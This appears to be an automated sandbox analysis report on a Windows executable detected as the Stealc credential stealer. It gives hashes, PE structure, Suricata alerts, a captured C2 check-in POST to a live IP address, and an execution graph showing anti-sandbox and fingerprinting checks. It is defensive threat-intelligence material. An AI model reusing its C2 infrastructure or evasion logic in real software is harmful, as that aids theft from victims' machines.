                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        file.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                        • 185.215.113.103
                        c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                        • 185.215.113.103
                        NHvurkKE21.exeGet hashmaliciousStealc, VidarBrowse
                        • 185.215.113.37
                        XDPT5mgIBO.exeGet hashmaliciousStealcBrowse
                        • 185.215.113.37
                        p7SnjaA8NN.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                        • 185.215.113.103
                        TVyKPaL2h0.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.103
                        bUyvu6YU2H.exeGet hashmaliciousAmadeyBrowse
                        • 185.215.113.19

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.944532610494713
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'794'560 bytes
                        MD5:c1a82a310c9dc31947dfae1e6136dc46
                        SHA1:a9868cf5ede614df7911b1e62b5d20a04fc4c259
                        SHA256:35ce1834e64cfffdd4729c0254790e7aca014b3013733ccf872907d8d04e2b2b
                        SHA512:9d92a6b5b19ffa9a4b4d82ff2a09347e7cbc5e26ce9e06c35cd9c4adb860f08b8025d6a1526efeaed0da375042fb6a2ca5143074f85d708c806c7f2212e3f077
                        SSDEEP:49152:M/JfWg/LVoIxTfmkLXMlEdeZV5yPfPhx62Aoz:i/JhpLXiEgXUvhBLz
                        TLSH:048533E2D8B50457CE1AC133A0B7CB19B85E62940E94C8B3273787FC4D9F6866F895B4
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                        File Icon

                        Icon Hash:90cececece8e8eb0

                        Static PE Info

                        General

                        Entrypoint:0xa73000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                        Entrypoint Preview

                        Instruction
                        jmp 00007F0C44C288EAh
                        cmovo ebx, dword ptr [ebx]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add cl, ch
                        add byte ptr [eax], ah
                        add byte ptr [eax], al
                        add byte ptr [0000000Ah], al
                        add byte ptr [eax], al
                        add byte ptr [eax], dh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+00000000h], cl
                        add byte ptr [eax], al
                        add byte ptr [edx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        push es
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Rich Headers

                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        0x10000x25b0000x22800d73e5942fadc9128897c3237cdc7e160unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        0x25e0000x2840000x20069339860efcd63c6f2c97603092e9d3aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        xchtnbzm0x4e20000x1900000x19000094af3e6945c1139c2d77068d064eb4d6False0.9942755126953124data7.9517025024735215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        hubelpjq0x6720000x10000x40015f3171a095d112c534dbdf6c1882ab6False0.8046875data6.298703171925784IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .taggant0x6730000x30000x220033fa5567cfee6c87a44f955985633450False0.06525735294117647DOS executable (COM)0.6772589354142736IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                        Imports

                        DLLImport
                        kernel32.dlllstrcpy

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-07T17:08:19.270990+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 7, 2024 17:08:18.043797016 CEST4973080192.168.2.4185.215.113.37
                        Oct 7, 2024 17:08:18.339405060 CEST8049730185.215.113.37192.168.2.4
                        Oct 7, 2024 17:08:18.339523077 CEST4973080192.168.2.4185.215.113.37
                        Oct 7, 2024 17:08:18.346466064 CEST4973080192.168.2.4185.215.113.37
                        Oct 7, 2024 17:08:18.351304054 CEST8049730185.215.113.37192.168.2.4
                        Oct 7, 2024 17:08:19.022883892 CEST8049730185.215.113.37192.168.2.4
                        Oct 7, 2024 17:08:19.023215055 CEST4973080192.168.2.4185.215.113.37
                        Oct 7, 2024 17:08:19.039110899 CEST4973080192.168.2.4185.215.113.37
                        Oct 7, 2024 17:08:19.043984890 CEST8049730185.215.113.37192.168.2.4
                        Oct 7, 2024 17:08:19.269064903 CEST8049730185.215.113.37192.168.2.4
                        Oct 7, 2024 17:08:19.270989895 CEST4973080192.168.2.4185.215.113.37
                        Oct 7, 2024 17:08:22.548217058 CEST4973080192.168.2.4185.215.113.37

                        HTTP Request Dependency Graph

                        • 185.215.113.37

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449730185.215.113.37806636C:\Users\user\Desktop\file.exe
                        TimestampBytes transferredDirectionData
                        Oct 7, 2024 17:08:18.346466064 CEST89OUTGET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 7, 2024 17:08:19.022883892 CEST203INHTTP/1.1 200 OK
                        Date: Mon, 07 Oct 2024 15:08:18 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 7, 2024 17:08:19.039110899 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJD
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 34 33 36 39 44 30 35 37 38 45 36 34 31 32 30 30 32 31 34 35 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a
                        Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="hwid"94369D0578E64120021454------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="build"doma------AAEGHJKJKKJDHIDHJKJD--
                        Oct 7, 2024 17:08:19.269064903 CEST210INHTTP/1.1 200 OK
                        Date: Mon, 07 Oct 2024 15:08:19 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        System Behavior

                        General

                        Target ID:0
                        Start time:11:08:14
                        Start date:07/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x610000
                        File size:1'794'560 bytes
                        MD5 hash:C1A82A310C9DC31947DFAE1E6136DC46
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1876333554.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1831952446.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:8.5%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:9.7%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
                          execution_graph 13041 6269f0 13086 612260 13041->13086 13065 626a64 13066 62a9b0 4 API calls 13065->13066 13067 626a6b 13066->13067 13068 62a9b0 4 API calls 13067->13068 13069 626a72 13068->13069 13070 62a9b0 4 API calls 13069->13070 13071 626a79 13070->13071 13072 62a9b0 4 API calls 13071->13072 13073 626a80 13072->13073 13238 62a8a0 13073->13238 13075 626b0c 13242 626920 GetSystemTime 13075->13242 13076 626a89 13076->13075 13078 626ac2 OpenEventA 13076->13078 13080 626af5 CloseHandle Sleep 13078->13080 13081 626ad9 13078->13081 13083 626b0a 13080->13083 13085 626ae1 CreateEventA 13081->13085 13083->13076 13085->13075 13439 6145c0 13086->13439 13088 612274 13089 6145c0 2 API calls 13088->13089 13090 61228d 13089->13090 13091 6145c0 2 API calls 13090->13091 13092 6122a6 13091->13092 13093 6145c0 2 API calls 13092->13093 13094 6122bf 13093->13094 13095 6145c0 2 API calls 13094->13095 13096 6122d8 13095->13096 13097 6145c0 2 API calls 13096->13097 13098 6122f1 13097->13098 13099 6145c0 2 API calls 13098->13099 13100 61230a 13099->13100 13101 6145c0 2 API calls 13100->13101 13102 612323 13101->13102 13103 6145c0 2 API calls 13102->13103 13104 61233c 13103->13104 13105 6145c0 2 API calls 13104->13105 13106 612355 13105->13106 13107 6145c0 2 API calls 13106->13107 13108 61236e 13107->13108 13109 6145c0 2 API calls 13108->13109 13110 612387 13109->13110 13111 6145c0 2 API calls 13110->13111 13112 6123a0 13111->13112 13113 6145c0 2 API calls 13112->13113 13114 6123b9 13113->13114 13115 6145c0 2 API calls 13114->13115 13116 6123d2 13115->13116 13117 6145c0 2 API calls 13116->13117 13118 6123eb 13117->13118 13119 6145c0 2 API calls 13118->13119 13120 612404 13119->13120 13121 6145c0 2 API calls 13120->13121 13122 61241d 13121->13122 13123 6145c0 2 API calls 13122->13123 13124 612436 13123->13124 13125 6145c0 2 API calls 13124->13125 13126 61244f 13125->13126 13127 6145c0 2 API calls 13126->13127 13128 612468 13127->13128 13129 6145c0 2 API calls 13128->13129 13130 612481 13129->13130 13131 6145c0 2 API calls 13130->13131 13132 61249a 13131->13132 13133 6145c0 2 API calls 13132->13133 13134 6124b3 13133->13134 13135 6145c0 2 API calls 13134->13135 13136 6124cc 13135->13136 13137 6145c0 2 API calls 13136->13137 13138 6124e5 13137->13138 13139 6145c0 2 API calls 13138->13139 13140 6124fe 13139->13140 13141 6145c0 2 API calls 13140->13141 13142 612517 13141->13142 13143 6145c0 2 API calls 13142->13143 13144 612530 13143->13144 13145 6145c0 2 API calls 13144->13145 13146 612549 13145->13146 13147 6145c0 2 API calls 13146->13147 13148 612562 13147->13148 13149 6145c0 2 API calls 13148->13149 13150 61257b 13149->13150 13151 6145c0 2 API calls 13150->13151 13152 612594 13151->13152 13153 6145c0 2 API calls 13152->13153 13154 6125ad 13153->13154 13155 6145c0 2 API calls 13154->13155 13156 6125c6 13155->13156 13157 6145c0 2 API calls 13156->13157 13158 6125df 13157->13158 13159 6145c0 2 API calls 13158->13159 13160 6125f8 13159->13160 13161 6145c0 2 API calls 13160->13161 13162 612611 13161->13162 13163 6145c0 2 API calls 13162->13163 13164 61262a 13163->13164 13165 6145c0 2 API calls 13164->13165 13166 612643 13165->13166 13167 6145c0 2 API calls 13166->13167 13168 61265c 13167->13168 13169 6145c0 2 API calls 13168->13169 13170 612675 13169->13170 13171 6145c0 2 API calls 13170->13171 13172 61268e 13171->13172 13173 629860 13172->13173 13444 629750 GetPEB 13173->13444 13175 629868 13176 629a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13175->13176 13177 62987a 13175->13177 13178 629af4 GetProcAddress 13176->13178 13179 629b0d 13176->13179 13182 62988c 21 API calls 13177->13182 13178->13179 13180 629b46 13179->13180 13181 629b16 GetProcAddress GetProcAddress 13179->13181 13183 629b68 13180->13183 13184 629b4f GetProcAddress 13180->13184 13181->13180 13182->13176 13185 629b71 GetProcAddress 13183->13185 13186 629b89 13183->13186 13184->13183 13185->13186 13187 629b92 GetProcAddress GetProcAddress 13186->13187 13188 626a00 13186->13188 13187->13188 13189 62a740 13188->13189 13190 62a750 13189->13190 13191 626a0d 13190->13191 13192 62a77e lstrcpy 13190->13192 13193 6111d0 13191->13193 13192->13191 13194 6111e8 13193->13194 13195 611217 13194->13195 13196 61120f ExitProcess 13194->13196 13197 611160 GetSystemInfo 13195->13197 13198 611184 13197->13198 13199 61117c ExitProcess 13197->13199 13200 611110 GetCurrentProcess VirtualAllocExNuma 13198->13200 13201 611141 ExitProcess 13200->13201 13202 611149 13200->13202 13445 6110a0 VirtualAlloc 13202->13445 13205 611220 13449 6289b0 13205->13449 13208 611249 __aulldiv 13209 61129a 13208->13209 13210 611292 ExitProcess 13208->13210 13211 626770 GetUserDefaultLangID 13209->13211 13212 626792 13211->13212 13213 6267d3 13211->13213 13212->13213 13214 6267a3 ExitProcess 13212->13214 13215 6267c1 ExitProcess 13212->13215 13216 6267b7 ExitProcess 13212->13216 13217 6267cb ExitProcess 13212->13217 13218 6267ad ExitProcess 13212->13218 13219 611190 13213->13219 13220 6278e0 3 API calls 13219->13220 13221 61119e 13220->13221 13222 6111cc 13221->13222 13223 627850 3 API calls 13221->13223 13226 627850 GetProcessHeap RtlAllocateHeap GetUserNameA 13222->13226 13224 6111b7 13223->13224 13224->13222 13225 6111c4 ExitProcess 13224->13225 13227 626a30 13226->13227 13228 6278e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13227->13228 13229 626a43 13228->13229 13230 62a9b0 13229->13230 13451 62a710 13230->13451 13232 62a9c1 lstrlen 13234 62a9e0 13232->13234 13233 62aa18 13452 62a7a0 13233->13452 13234->13233 13236 62a9fa lstrcpy lstrcat 13234->13236 13236->13233 13237 62aa24 13237->13065 13239 62a8bb 13238->13239 13240 62a90b 13239->13240 13241 62a8f9 lstrcpy 13239->13241 13240->13076 13241->13240 13456 626820 13242->13456 13244 62698e 13245 626998 sscanf 13244->13245 13485 62a800 13245->13485 13247 6269aa SystemTimeToFileTime SystemTimeToFileTime 13248 6269e0 13247->13248 13249 6269ce 13247->13249 13251 625b10 13248->13251 13249->13248 13250 6269d8 ExitProcess 13249->13250 13252 625b1d 13251->13252 13253 62a740 lstrcpy 13252->13253 13254 625b2e 13253->13254 13487 62a820 lstrlen 13254->13487 13257 62a820 2 API calls 13258 625b64 13257->13258 13259 62a820 2 API calls 13258->13259 13260 625b74 13259->13260 13491 626430 13260->13491 13263 62a820 2 API calls 13264 625b93 13263->13264 13265 62a820 2 API calls 13264->13265 13266 625ba0 13265->13266 13267 62a820 2 API calls 13266->13267 13268 625bad 13267->13268 13269 62a820 2 API calls 13268->13269 13270 625bf9 13269->13270 13500 6126a0 13270->13500 13278 625cc3 13279 626430 lstrcpy 13278->13279 13280 625cd5 13279->13280 13281 62a7a0 lstrcpy 13280->13281 13282 625cf2 13281->13282 13283 62a9b0 4 API calls 13282->13283 13284 625d0a 13283->13284 13285 62a8a0 lstrcpy 13284->13285 13286 625d16 13285->13286 13287 62a9b0 4 API calls 13286->13287 13288 625d3a 13287->13288 13289 62a8a0 lstrcpy 13288->13289 13290 625d46 13289->13290 13291 62a9b0 4 API calls 13290->13291 13292 625d6a 13291->13292 13293 62a8a0 lstrcpy 13292->13293 13294 625d76 13293->13294 13295 62a740 lstrcpy 13294->13295 13296 625d9e 13295->13296 14226 627500 GetWindowsDirectoryA 13296->14226 13299 62a7a0 lstrcpy 13300 625db8 13299->13300 14236 614880 13300->14236 13302 625dbe 14381 6217a0 13302->14381 13304 625dc6 13305 62a740 lstrcpy 13304->13305 13306 625de9 13305->13306 13307 611590 lstrcpy 13306->13307 13308 625dfd 13307->13308 14397 615960 13308->14397 13310 625e03 14541 621050 13310->14541 13312 625e0e 13313 62a740 lstrcpy 13312->13313 13314 625e32 13313->13314 13315 611590 lstrcpy 13314->13315 13316 625e46 13315->13316 13317 615960 34 API calls 13316->13317 13318 625e4c 13317->13318 14545 620d90 13318->14545 13320 625e57 13321 62a740 lstrcpy 13320->13321 13322 625e79 13321->13322 13323 611590 lstrcpy 13322->13323 13324 625e8d 13323->13324 13325 615960 34 API calls 13324->13325 13326 625e93 13325->13326 14552 620f40 13326->14552 13328 625e9e 13329 611590 lstrcpy 13328->13329 13330 625eb5 13329->13330 14557 621a10 13330->14557 13332 625eba 13333 62a740 lstrcpy 13332->13333 13334 625ed6 13333->13334 14901 614fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13334->14901 13336 625edb 13337 611590 lstrcpy 13336->13337 13338 625f5b 13337->13338 14908 620740 13338->14908 13340 625f60 13341 62a740 lstrcpy 13340->13341 13342 625f86 13341->13342 13343 611590 lstrcpy 13342->13343 13344 625f9a 13343->13344 13345 615960 34 API calls 13344->13345 13346 625fa0 13345->13346 13440 6145d1 RtlAllocateHeap 13439->13440 13442 614621 VirtualProtect 13440->13442 13442->13088 13444->13175 13447 6110c2 codecvt 13445->13447 13446 6110fd 13446->13205 13447->13446 13448 6110e2 VirtualFree 13447->13448 13448->13446 13450 611233 GlobalMemoryStatusEx 13449->13450 13450->13208 13451->13232 13453 62a7c2 13452->13453 13454 62a7ec 13453->13454 13455 62a7da lstrcpy 13453->13455 13454->13237 13455->13454 13457 62a740 lstrcpy 13456->13457 13458 626833 13457->13458 13459 62a9b0 4 API calls 13458->13459 13460 626845 13459->13460 13461 62a8a0 lstrcpy 13460->13461 13462 62684e 13461->13462 13463 62a9b0 4 API calls 13462->13463 13464 626867 13463->13464 13465 62a8a0 lstrcpy 13464->13465 13466 626870 13465->13466 13467 62a9b0 4 API calls 13466->13467 13468 62688a 13467->13468 13469 62a8a0 lstrcpy 13468->13469 13470 626893 13469->13470 13471 62a9b0 4 API calls 13470->13471 13472 6268ac 13471->13472 13473 62a8a0 lstrcpy 13472->13473 13474 6268b5 13473->13474 13475 62a9b0 4 API calls 13474->13475 13476 6268cf 13475->13476 13477 62a8a0 lstrcpy 13476->13477 13478 6268d8 13477->13478 13479 62a9b0 4 API calls 13478->13479 13480 6268f3 13479->13480 13481 62a8a0 lstrcpy 13480->13481 13482 6268fc 13481->13482 13483 62a7a0 lstrcpy 13482->13483 13484 626910 13483->13484 13484->13244 13486 62a812 13485->13486 13486->13247 13488 62a83f 13487->13488 13489 625b54 13488->13489 13490 62a87b lstrcpy 13488->13490 13489->13257 13490->13489 13492 62a8a0 lstrcpy 13491->13492 13493 626443 13492->13493 13494 62a8a0 lstrcpy 13493->13494 13495 626455 13494->13495 13496 62a8a0 lstrcpy 13495->13496 13497 626467 13496->13497 13498 62a8a0 lstrcpy 13497->13498 13499 625b86 13498->13499 13499->13263 13501 6145c0 2 API calls 13500->13501 13502 6126b4 13501->13502 13503 6145c0 2 API calls 13502->13503 13504 6126d7 13503->13504 13505 6145c0 2 API calls 13504->13505 13506 6126f0 13505->13506 13507 6145c0 2 API calls 13506->13507 13508 612709 13507->13508 13509 6145c0 2 API calls 13508->13509 13510 612736 13509->13510 13511 6145c0 2 API calls 13510->13511 13512 61274f 13511->13512 13513 6145c0 2 API calls 13512->13513 13514 612768 13513->13514 13515 6145c0 2 API calls 13514->13515 13516 612795 13515->13516 13517 6145c0 2 API calls 13516->13517 13518 6127ae 13517->13518 13519 6145c0 2 API calls 13518->13519 13520 6127c7 13519->13520 13521 6145c0 2 API calls 13520->13521 13522 6127e0 13521->13522 13523 6145c0 2 API calls 13522->13523 13524 6127f9 13523->13524 13525 6145c0 2 API calls 13524->13525 13526 612812 13525->13526 13527 6145c0 2 API calls 13526->13527 13528 61282b 13527->13528 13529 6145c0 2 API calls 13528->13529 13530 612844 13529->13530 13531 6145c0 2 API calls 13530->13531 13532 61285d 13531->13532 13533 6145c0 2 API calls 13532->13533 13534 612876 13533->13534 13535 6145c0 2 API calls 13534->13535 13536 61288f 13535->13536 13537 6145c0 2 API calls 13536->13537 13538 6128a8 13537->13538 13539 6145c0 2 API calls 13538->13539 13540 6128c1 13539->13540 13541 6145c0 2 API calls 13540->13541 13542 6128da 13541->13542 13543 6145c0 2 API calls 13542->13543 13544 6128f3 13543->13544 13545 6145c0 2 API calls 13544->13545 13546 61290c 13545->13546 13547 6145c0 2 API calls 13546->13547 13548 612925 13547->13548 13549 6145c0 2 API calls 13548->13549 13550 61293e 13549->13550 13551 6145c0 2 API calls 13550->13551 13552 612957 13551->13552 13553 6145c0 2 API calls 13552->13553 13554 612970 13553->13554 13555 6145c0 2 API calls 13554->13555 13556 612989 13555->13556 13557 6145c0 2 API calls 13556->13557 13558 6129a2 13557->13558 13559 6145c0 2 API calls 13558->13559 13560 6129bb 13559->13560 13561 6145c0 2 API calls 13560->13561 13562 6129d4 13561->13562 13563 6145c0 2 API calls 13562->13563 13564 6129ed 13563->13564 13565 6145c0 2 API calls 13564->13565 13566 612a06 13565->13566 13567 6145c0 2 API calls 13566->13567 13568 612a1f 13567->13568 13569 6145c0 2 API calls 13568->13569 13570 612a38 13569->13570 13571 6145c0 2 API calls 13570->13571 13572 612a51 13571->13572 13573 6145c0 2 API calls 13572->13573 13574 612a6a 13573->13574 13575 6145c0 2 API calls 13574->13575 13576 612a83 13575->13576 13577 6145c0 2 API calls 13576->13577 13578 612a9c 13577->13578 13579 6145c0 2 API calls 13578->13579 13580 612ab5 13579->13580 13581 6145c0 2 API calls 13580->13581 13582 612ace 13581->13582 13583 6145c0 2 API calls 13582->13583 13584 612ae7 13583->13584 13585 6145c0 2 API calls 13584->13585 13586 612b00 13585->13586 13587 6145c0 2 API calls 13586->13587 13588 612b19 13587->13588 13589 6145c0 2 API calls 13588->13589 13590 612b32 13589->13590 13591 6145c0 2 API calls 13590->13591 13592 612b4b 13591->13592 13593 6145c0 2 API calls 13592->13593 13594 612b64 13593->13594 13595 6145c0 2 API calls 13594->13595 13596 612b7d 13595->13596 13597 6145c0 2 API calls 13596->13597 13598 612b96 13597->13598 13599 6145c0 2 API calls 13598->13599 13600 612baf 13599->13600 13601 6145c0 2 API calls 13600->13601 13602 612bc8 13601->13602 13603 6145c0 2 API calls 13602->13603 13604 612be1 13603->13604 13605 6145c0 2 API calls 13604->13605 13606 612bfa 13605->13606 13607 6145c0 2 API calls 13606->13607 13608 612c13 13607->13608 13609 6145c0 2 API calls 13608->13609 13610 612c2c 13609->13610 13611 6145c0 2 API calls 13610->13611 13612 612c45 13611->13612 13613 6145c0 2 API calls 13612->13613 13614 612c5e 13613->13614 13615 6145c0 2 API calls 13614->13615 13616 612c77 13615->13616 13617 6145c0 2 API calls 13616->13617 13618 612c90 13617->13618 13619 6145c0 2 API calls 13618->13619 13620 612ca9 13619->13620 13621 6145c0 2 API calls 13620->13621 13622 612cc2 13621->13622 13623 6145c0 2 API calls 13622->13623 13624 612cdb 13623->13624 13625 6145c0 2 API calls 13624->13625 13626 612cf4 13625->13626 13627 6145c0 2 API calls 13626->13627 13628 612d0d 13627->13628 13629 6145c0 2 API calls 13628->13629 13630 612d26 13629->13630 13631 6145c0 2 API calls 13630->13631 13632 612d3f 13631->13632 13633 6145c0 2 API calls 